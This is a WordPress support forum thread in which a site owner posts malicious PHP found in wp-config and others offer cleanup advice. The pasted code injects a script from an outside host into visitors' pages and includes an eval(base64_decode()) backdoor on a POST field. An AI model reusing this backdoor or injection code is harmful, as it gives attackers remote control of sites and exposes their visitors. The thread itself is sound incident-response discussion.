Ready to get started?Download WordPress


[resolved] Site hacked (7 posts)

  1. Gabriel Reguly
    Posted 2 years ago #


    I got this nasty code added in my wp-config file.

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    That is removed now, but I wonder how I got infected in order to prevent from it happening again.

    There is a thread here: http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does/8079131#8079131


  2. seabro
    Posted 2 years ago #

    All of my sites got hacked too.

    This code was found in some PHP files. Also, there were some files in root of each directory which begin tmp_ then random numbers like tmp_6576768676.php

    Also, check all your .htaccess but make sure you scroll down and across as they modify .htaccess but the code is not straight after existing code.

    I just spent 2 hours sorting out about 50 directories. I hope all is clear now.

  3. vencedorbg
    Posted 2 years ago #

    my best guess is that your theme is using timthumb. You have to update it, by saving it from their official website, here
    and then find it in your wordpress theme and replace it.

  4. Sabinou
    Posted 2 years ago #

    And don't forget to read

    Timthumb.php would be first to upgrade.

    If your web host provides server logs, you may wish to search if there are FTP/SSH logins by other IPs than yor own (meaning : leaked credentials).

    Etcetera... Sadly, it's a vast question. The best usually is to do a clean reinstall (only reupping a fresh virgin theme, the double-checked uploads folder, redownloading the plugins from wordpress.org, restoring a database backup) and change ALL your passwords (web host account, FTP, SSH, emails including the "lost password" possible question).

  5. Gabriel Reguly
    Posted 2 years ago #

    Thanks for the answers.

    This hack also impacted non WP sites (like ZenPhoto) and was executed against an exploit in the Ajax File Manager included in TinyMCE by some CMS systems.

    One can read more details info here: http://www.zenphoto.org/trac/ticket/2005

    That answer was provided by an expert from WP Questions: http://wpquestions.com/question/showLoggedIn/id/3341

  6. Those are two different hacks, as it happens, but yeah, watch out for that too :/

  7. Gabriel Reguly
    Posted 2 years ago #

    Thanks Ipstenu!

    I had no timthumb installed, it was the Ajax File Manager that was on another site that was exploited and then infected my WordPress install too.

    (Both sites are in a shared server with several accounts/sites)


Topic Closed

This topic has been closed to new replies.

About this Topic